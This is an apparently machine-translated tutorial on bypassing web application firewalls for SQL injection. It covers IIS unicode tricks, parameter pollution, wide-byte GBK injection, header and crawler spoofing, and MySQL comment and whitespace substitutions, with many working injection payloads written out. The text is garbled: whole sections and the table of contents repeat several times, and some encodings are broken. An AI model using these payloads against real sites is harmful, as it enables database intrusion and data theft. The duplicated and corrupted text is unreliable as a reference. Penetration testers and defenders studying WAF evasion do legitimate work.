It is to insert % into the command, so that the waf layer cannot parse the complete command and release it, but it may be recognized and parsed out the complete command when running at the database level, so as to achieve the purpose of bypassing waf

Example: For example , s%elect is separated by %, so the recognition result of waf layer may be s%elect , but it may be recognized and parsed as select at the database level , so the purpose of bypassing waf is achieved

(2) %u characteristics:

It is suitable for bypassing waf with unicode encoding , the unicode encoding will be replaced by multibyte encoding when it is parsed by iis , but several different unicode encodings will be replaced by the same multibyte , and the waf layer may only recognize one of the unicode encodings, so changing another unicode encoding at this time may bypass the protection of waf

Example: For example , the unicode encoding of e in select is %u0065 , but %u00f0 and %u0045 will also be transformed into e , and waf may only recognize %u0065, so we can successfully bypass waf by changing it to %u00f0, but iis parses it as e , so it can be understood as

select=s%u0045lect = s%u0065lect =%u00f0lect

The following is a common uncoide encoding replacement scheme for everyone.

Common test cases for three keywords (union, select , from ):
u -- > %u 0055 -- > %u 0075
n -- > %u 004e -- > %u 006e
i -- > %u 0049 -- > %u 0069
o -- > %u 004f -- > %u 006f -- > %u 00ba
s -- > %u 0053 -- > %u 0073
l -- > %u 004c -- > %u 006c
e -- > %u 0045 -- > %u 0065 -- > %u 00f 0
c -- > %u 0043 -- > %u 0063
t -- > %u 0054 -- > %u 0074 -- > %u 00 de -- > %u 00fe
f -- > %u 0046 -- > %u 0066
r -- > %u 0052 -- > %u 0072
m -- > %u 004d -- > %u 006d

2. ASP+IIS and ASPX+IIS

(1) The IIS server supports parsing of unicode

For example, if you perform unicode encoding on the select command , you can get s%u006c%u0006ect . When receiving it, iis will analyze the unicode encoding and finally recognize it as select , but the waf layer may not recognize the unicode encoding

3. Apache malformed bypass

(1) get replace

In the data packet initiated by the GET request, GET can be replaced by any character (generally replaced by POST), which does not affect the apahce receiving parameter id=2, that is, replace the GET in the request packet on my circle with anything

Three: application layer features

1. Case bypass

There is no need to say more about this, it is to replace the characters in the command with a case , sometimes it can bypass waf

Example: Change select to SeleCt (generally waf will have protection against this, but you can still try your luck)

2. Keyword Substitution

Keyword replacement is often used in normal penetration, mainly to find synonymous functions and substitutes. When some keywords are blocked by protection, you can try to replace them .

The following also prepares some commonly used keywords for you to replace

( 1 ) and -- > & & -- > or --- > xor -- > || // (url encoding is required when using) ( xor can only be true if one is true and the other is false, and all others are false )
( 2)ascii() -- > He x() -- > bin() -- >ord()
( 3)sleep() -- > benchmark()
( 4)substr() -- > mid() -- > substring()
( 5)user() -- > @@user
( 6)version() -- >@@version
( 7)# -- > -- + -- > ;% 00
( 8) = -- > in -- > regexp -- > like -- > <>

3. Double encoding

Double-encode the command , unicode, base64, hex can all be tried, it is possible to bypass the recognition of waf

4. Change request method

(1 ) Change the data packet submitted by GET to POST by modifying the sent data packet
(2) In the POST request, the Post data packet can be converted into a multipart/form-data format packet (burp can be changed)

5. HPP parameter pollution

(1) Parameter confusion

It is to try to add more parameters and change the injection location to confuse the identification mechanism when injecting , assuming that there is an injection point of a site www.xxxx/?id=1, the details are as follows (this operation has different effects on different environments )

operate:

【1】 .Add more confusion parameters

例如：?id=1&id=2&id=3

【2】.In the asp + iis environment:

The real id recognized by the system is equal to 1+2+3 , that is, the values of the three ids will be concatenated as the received id value . At this time, we can split and inject the attack command to achieve the purpose of bypassing waf

For example : ?id=1 union&ID=select 1,2&Id=from admin, the real id value at this time is

1 union select 1 from admin

【3】In the environment of .php+apache:

At this time, the real id=3 recognized by the system is to only recognize the value of the last id, regardless of the previous id

(2) Parameter splicing

Get+post+cookie three data transmission methods splicing parameter transfer

(3) filter comma

?id=1 select 1,2,3,4 from admin can be modified to the following format that does not require commas

?id=1 union select 1&id=2&id=3&id=4 from admin

(4) invalid parameter

For example: ?a=/*&sql=xxx&b=*/ (no parameter form)

(a and b are invalid parameters, but the values of a and b form a comment character (/**/). By making waf think that this is executed in the comment, it will not be intercepted, but at this time, the parameters between a and b can be injected.)

(5) Overflow form

The overflow form is a particularly commonly used injection method, which relies on the buffer overflow mechanism to use a large amount of dirty data to make our attack commands bypass the interception of waf

Example :?id=1/*&id=*//*&id=*//*......&id=*//*&id=*/ union select null,system_user,null from INFORMATION_SCHEMA.schemata

6. Wide byte bypass

(1) gbk encoding conversion

Wide byte injection is a feature of mysql. When mysql uses GBK encoding, it will think that two characters are a Chinese character (the previous ASCII code must be greater than 128 to reach the range of Chinese characters)

The reason for the wide-byte injection is that part of the protection mechanism is to use the addslashes function, which will add "\" before the illegal characters we input, and "\" will form a gbk encoding format with the first character of our malicious code and be parsed, resulting in our injection being unsuccessful

Example: Injection point: www.xxxx.com?id=1

If you add a single quotation mark as in the normal penetration operation, then he will generate a '\' in front of the single quotation mark, becoming "\'" and the single quotation mark to form a gbk code

At this time, we can add %81 in front of ', and the following state will be formed

www.xxxx.com?id=1%81\'

At this time, %81 will form a GBK code with the generated \, that is, %81%5C , which is recognized as a "multiply" by GBK as a code, and the single quotes will not be affected and injected normally

Online gbk code comparison table: GBK code range, GBK code table (qqxiuzi.cn)

Four: WAF layer characteristics:

1. Logical Questions

(1) cdn protection type

Some sites only have cdn protection , so we can bypass the cdn protection by finding the real ip

(2) Data confusion type

That is, get and post are submitted at the same time , and it is possible that waf enters the post logic and ignores the harmful parameters of get

(3) Misconfiguration type

When encountering an https site, the http service may also be opened at the same time . At this time, only https may have protection. You only need to replace https in the url with http to bypass

(4) 00 truncated type

%00, some waf cannot recognize the data after %00, at this time, you can put id=1%00, and put the injection statement later

2. Performance issues

(1) Data volume problem

Fill dirty data to make the data reach a certain level. At this time, the injection statement is placed at the end, such as passing in multiple parameters and other parameters, but the correct parameters are passed in at the end

(2) Processing capacity problem

The same request is sent multiple times, some wafs have low performance and can be bypassed, and the burp is sent directly

Note: The two here are used with caution , which may affect the normal operation of some small websites

3. Whitelist

(1) ip whitelist

Some waf will set up a white list to facilitate the access and management of administrators and other personnel . If you have obtained the ip information of the administrator at this time , you can bypass waf by modifying the following parameters in the request packet (if not, you can add it directly)

X-forwarded-for
X-remote-IP
X-originating-IP
x-remote-addr
X-Real-ip

(2) Static resources

Common static files (.js .jpg .swf .css, etc.), because some administrators set up a whitelist of suffixes for the convenience of calling resources , and waf will not intercept them after recognizing them. Adding the requested data to the static resource suffix in the whitelist can bypass waf

For example: http://10.9.9.201/sql.php/1.js?id=1

(3) URL whitelist

The principle is the same. Some administrators want to reduce the cost of protection. Some unimportant paths will not be protected by CDN, and the way to judge whether the path is important is to add a whitelist. As long as the path in the whitelist is detected, it will be released directly .

Steps : directly set another parameter, the value of the parameter is some path, it may also bypass

(4) Reptile white list

This is easier to understand. In order to gain more weight in search engines such as Baidu and Goole, many websites will add the UA header of such search engines to the white list when crawling web pages . At this time, we only need to replace our UA header with the UA of the search engine to bypass waf

The user-agent is disguised as a crawler. Below I have prepared some common search engine crawler UA headers for you.

The following three correspond to Google, Baidu, Yahoo
UserAgent: "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
UserAgent: "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
UserAgent: "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Five: mysql database features

1.Mysql:

(1) Commonly used:

Inline comment: /*!12345union*/select
Mysql black magic: select{x user}from{x mysql.user};
newline bypass: %23%0a, %2d%2d%0a

(2) Injection statement replacement method

[1] Common replacement methods for spaces
/**/
/*!12345union*/
/*anything*/

[2] Blank characters

Can be added at any position
%09,%0a,%0b,%0c,%0d,%20,%a0 can be replaced

Generally, %a0 and %0a are used together more, that is, %a0%0a

[3] Replace the number of the injection statement with a floating point type
[4] Replace the space with 1E0
[5] Replace the space with /N
[6] Wrap the function with spaces or quotation marks
[7] Replace spaces with special symbols

Sometimes spaces are also called an important basis for waf judgment, so we can also replace spaces with other characters

The following are the common replacements I prepared for you.

% 21 ! exclamation point
% 2 b + plus sign
% 2d - minus sign
% 40 @ email symbol
% 7 e ~ tilde

(3) function

[1] Common string interception functions

Mid(version(),1,1)

Substr(version(),1,1)

Substring(version(),1,1)

Lpad(version(),1,1)

Rpad(version(),1,1)

Left(version(),1)

reverse(right(reverse(version()),1))

[2] Common string concatenation functions

concat(version(),'|',user());

concat_ws('|',1,2,3)

[3] Special characters are filtered
[1] comma of limit
limit 1 offset 0
[2] comma
mid(version() from 1 for 1) at
string interception [3] comma at union
union select * from (select 1)a join (select 2)b join (select 3)c
[4] comparison symbol
greatest is filtered instead, and greatest returns the maximum value of the three parameters

[4] Partial function construction

【1】sleep:

id=1 xor sleep%23%0a(5)

id=1 xor sleep%2d%2d%0a(5)

id=1 xor sleep([%20]5)

【2】select：

select{x[fillable characters]1}

This article is suitable for beginners of sql injection in penetration testing, or students who have little knowledge of sql injection. This is only a part. The most important point is that although there are many bypass postures here, various magic bypass methods derived from multi-layer nesting of these postures are often the best in actual combat .

Table of contents

1. Identify WAF type

1.Nmap:

2.Waf00f:

3. Intercept information observation

2. Observe server characteristics

1.ASP+IIS

(1)% Features:

(2) %u characteristics:

2. ASP+IIS and ASPX+IIS

(1) The IIS server supports parsing of unicode

3. Apache malformed bypass

(1) get replace

Three: application layer features

1. Case bypass

2. Keyword Substitution

3. Double encoding

4. Change request method

5. HPP parameter pollution

(1) Parameter confusion

(2) Parameter splicing

(3) filter comma

(4) invalid parameter

(5) Overflow form

6. Wide byte bypass

(1) gbk encoding conversion

Four: WAF layer characteristics:

1. Logical Questions

(1) cdn protection type

(2) Data confusion type

(3) Misconfiguration type

(4) 00 truncated type

2. Performance issues

(1) Data volume problem

(2) Processing capacity problem

(4) Reptile white list

Five: mysql database features

1.Mysql:

(1) Commonly used:

(2) Injection statement replacement method

(3) function

1. Identify WAF type

1.Nmap:

Usage: nmap -p 80 --script http-waf-fingerprint URL
demo: nmap -p 80 --script http-waf-detect.nse www.baidu.com

2.Waf00f:

Usage: waf00f URL, the tool comes with kali

3. Intercept information observation

According to the interception interface, the waf type can generally be observed, but some cannot

2. Observe server characteristics

1.ASP+IIS

If the backend language of the website is ASP , and the IIS middleware is used , the following waf bypass postures may exist

(1)% Features:

It is to insert % into the command, so that the waf layer cannot parse the complete command and release it, but it may be recognized and parsed out the complete command when running at the database level, so as to achieve the purpose of bypassing waf

(2) %u characteristics:

It is suitable for bypassing waf with unicode encoding , the unicode encoding will be replaced by multibyte encoding when it is parsed by iis , but several different unicode encodings will be replaced by the same multibyte , and the waf layer may only recognize one of the unicode encodings, so changing another unicode encoding at this time may bypass the protection of waf

select=s%u0045lect = s%u0065lect =%u00f0lect

The following is a common uncoide encoding replacement scheme for everyone.

Common test cases for three keywords (union, select , from ):
u -- > %u 0055 -- > %u 0075
n -- > %u 004e -- > %u 006e
i -- > %u 0049 -- > %u 0069
o -- > %u 004f -- > %u 006f -- > %u 00ba
s -- > %u 0053 -- > %u 0073
l -- > %u 004c -- > %u 006c
e -- > %u 0045 -- > %u 0065 -- > %u 00f 0
c -- > %u 0043 -- > %u 0063
t -- > %u 0054 -- > %u 0074 -- > %u 00 de -- > %u 00fe
f -- > %u 0046 -- > %u 0066
r -- > %u 0052 -- > %u 0072
m -- > %u 004d -- > %u 006d

2. ASP+IIS and ASPX+IIS

(1) The IIS server supports parsing of unicode

3. Apache malformed bypass

(1) get replace

Three: application layer features

1. Case bypass

There is no need to say more about this, it is to replace the characters in the command with a case , sometimes it can bypass waf

Example: Change select to SeleCt (generally waf will have protection against this, but you can still try your luck)

2. Keyword Substitution

Keyword replacement is often used in normal penetration, mainly to find synonymous functions and substitutes. When some keywords are blocked by protection, you can try to replace them .

The following also prepares some commonly used keywords for you to replace

( 1 ) and -- > & & -- > or --- > xor -- > || // (url encoding is required when using) ( xor can only be true if one is true and the other is false, and all others are false )
( 2)ascii() -- > He x() -- > bin() -- >ord()
( 3)sleep() -- > benchmark()
( 4)substr() -- > mid() -- > substring()
( 5)user() -- > @@user
( 6)version() -- >@@version
( 7)# -- > -- + -- > ;% 00
( 8) = -- > in -- > regexp -- > like -- > <>

3. Double encoding

Double-encode the command , unicode, base64, hex can all be tried, it is possible to bypass the recognition of waf

4. Change request method

(1 ) Change the data packet submitted by GET to POST by modifying the sent data packet
(2) In the POST request, the Post data packet can be converted into a multipart/form-data format packet (burp can be changed)

5. HPP parameter pollution

(1) Parameter confusion

It is to try to add more parameters and change the injection location to confuse the identification mechanism when injecting , assuming that there is an injection point of a site www.xxxx/?id=1, the details are as follows (this operation has different effects on different environments )

operate:

【1】 .Add more confusion parameters

例如：?id=1&id=2&id=3

【2】.In the asp + iis environment:

For example : ?id=1 union&ID=select 1,2&Id=from admin, the real id value at this time is

1 union select 1 from admin

【3】In the environment of .php+apache:

At this time, the real id=3 recognized by the system is to only recognize the value of the last id, regardless of the previous id

(2) Parameter splicing

Get+post+cookie three data transmission methods splicing parameter transfer

(3) filter comma

?id=1 select 1,2,3,4 from admin can be modified to the following format that does not require commas

?id=1 union select 1&id=2&id=3&id=4 from admin

(4) invalid parameter

For example: ?a=/*&sql=xxx&b=*/ (no parameter form)

(5) Overflow form

The overflow form is a particularly commonly used injection method, which relies on the buffer overflow mechanism to use a large amount of dirty data to make our attack commands bypass the interception of waf

Example :?id=1/*&id=*//*&id=*//*......&id=*//*&id=*/ union select null,system_user,null from INFORMATION_SCHEMA.schemata

6. Wide byte bypass

(1) gbk encoding conversion

Wide byte injection is a feature of mysql. When mysql uses GBK encoding, it will think that two characters are a Chinese character (the previous ASCII code must be greater than 128 to reach the range of Chinese characters)

The reason for the wide-byte injection is that part of the protection mechanism is to use the addslashes function, which will add "\" before the illegal characters we input, and "\" will form a gbk encoding format with the first character of our malicious code and be parsed, resulting in our injection being unsuccessful

Example: Injection point: www.xxxx.com?id=1

At this time, we can add %81 in front of ', and the following state will be formed

www.xxxx.com?id=1%81\'

Online gbk code comparison table: GBK code range, GBK code table (qqxiuzi.cn)

Four: WAF layer characteristics:

1. Logical Questions

(1) cdn protection type

Some sites only have cdn protection , so we can bypass the cdn protection by finding the real ip

(2) Data confusion type

That is, get and post are submitted at the same time , and it is possible that waf enters the post logic and ignores the harmful parameters of get

(3) Misconfiguration type

(4) 00 truncated type

%00, some waf cannot recognize the data after %00, at this time, you can put id=1%00, and put the injection statement later

2. Performance issues

(1) Data volume problem

(2) Processing capacity problem

The same request is sent multiple times, some wafs have low performance and can be bypassed, and the burp is sent directly

Note: The two here are used with caution , which may affect the normal operation of some small websites

3. Whitelist

(1) ip whitelist

X-forwarded-for
X-remote-IP
X-originating-IP
x-remote-addr
X-Real-ip

(2) Static resources

Common static files (.js .jpg .swf .css, etc.), because some administrators set up a whitelist of suffixes for the convenience of calling resources , and waf will not intercept them after recognizing them. Adding the requested data to the static resource suffix in the whitelist can bypass waf

For example: http://10.9.9.201/sql.php/1.js?id=1

(3) URL whitelist

The principle is the same. Some administrators want to reduce the cost of protection. Some unimportant paths will not be protected by CDN, and the way to judge whether the path is important is to add a whitelist. As long as the path in the whitelist is detected, it will be released directly .

Steps : directly set another parameter, the value of the parameter is some path, it may also bypass

(4) Reptile white list

This is easier to understand. In order to gain more weight in search engines such as Baidu and Goole, many websites will add the UA header of such search engines to the white list when crawling web pages . At this time, we only need to replace our UA header with the UA of the search engine to bypass waf

The user-agent is disguised as a crawler. Below I have prepared some common search engine crawler UA headers for you.

The following three correspond to Google, Baidu, Yahoo
UserAgent: "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
UserAgent: "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
UserAgent: "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Five: mysql database features

1.Mysql:

(1) Commonly used:

Inline comment: /*!12345union*/select
Mysql black magic: select{x user}from{x mysql.user};
newline bypass: %23%0a, %2d%2d%0a

(2) Injection statement replacement method

[1] Common replacement methods for spaces
/**/
/*!12345union*/
/*anything*/

[2] Blank characters

Can be added at any position
%09,%0a,%0b,%0c,%0d,%20,%a0 can be replaced

Generally, %a0 and %0a are used together more, that is, %a0%0a

Sometimes spaces are also called an important basis for waf judgment, so we can also replace spaces with other characters

The following are the common replacements I prepared for you.

% 21 ! exclamation point
% 2 b + plus sign
% 2d - minus sign
% 40 @ email symbol
% 7 e ~ tilde

(3) function

[1] Common string interception functions

Mid(version(),1,1)

Substr(version(),1,1)

Substring(version(),1,1)

Lpad(version(),1,1)

Rpad(version(),1,1)

Left(version(),1)

reverse(right(reverse(version()),1))

[2] Common string concatenation functions

concat(version(),'|',user());

concat_ws('|',1,2,3)

[4] Partial function construction

【1】sleep:

id=1 xor sleep%23%0a(5)

id=1 xor sleep%2d%2d%0a(5)

id=1 xor sleep([%20]5)

【2】select：

select{x[fillable characters]1}

This article is suitable for beginners of sql injection in penetration testing, or students who have little knowledge of sql injection. This is only a part. The most important point is that although there are many bypass postures here, various magic bypass methods derived from multi-layer nesting of these postures are often the best in actual combat .

One article to understand sql injection bypass

1. Identify WAF type

1.Nmap:

2.Waf00f:

3. Intercept information observation

2. Observe server characteristics

1.ASP+IIS

(1)% Features:

(2) %u characteristics:

2. ASP+IIS and ASPX+IIS

(1) The IIS server supports parsing of unicode

3. Apache malformed bypass

(1) get replace

Three: application layer features

1. Case bypass

2. Keyword Substitution

3. Double encoding

4. Change request method

5. HPP parameter pollution

(1) Parameter confusion

(2) Parameter splicing

(3) filter comma

(4) invalid parameter

(5) Overflow form

6. Wide byte bypass

(1) gbk encoding conversion

Four: WAF layer characteristics:

1. Logical Questions

(1) cdn protection type

(2) Data confusion type

(3) Misconfiguration type

(4) 00 truncated type

2. Performance issues

(1) Data volume problem

(2) Processing capacity problem

3. Whitelist

(1) ip whitelist

(2) Static resources

(3) URL whitelist

(4) Reptile white list

Five: mysql database features

1.Mysql:

(1) Commonly used:

(2) Injection statement replacement method

(3) function

1. Identify WAF type

1.Nmap:

2.Waf00f:

3. Intercept information observation

2. Observe server characteristics

1.ASP+IIS

(1)% Features:

(2) %u characteristics:

2. ASP+IIS and ASPX+IIS

(1) The IIS server supports parsing of unicode

3. Apache malformed bypass

(1) get replace

Three: application layer features

1. Case bypass

2. Keyword Substitution

3. Double encoding

4. Change request method

5. HPP parameter pollution

(1) Parameter confusion

(2) Parameter splicing

(3) filter comma

(4) invalid parameter

(5) Overflow form

6. Wide byte bypass

(1) gbk encoding conversion

Four: WAF layer characteristics:

1. Logical Questions

(1) cdn protection type

(2) Data confusion type

(3) Misconfiguration type

(4) 00 truncated type

2. Performance issues

(1) Data volume problem

(2) Processing capacity problem

3. Whitelist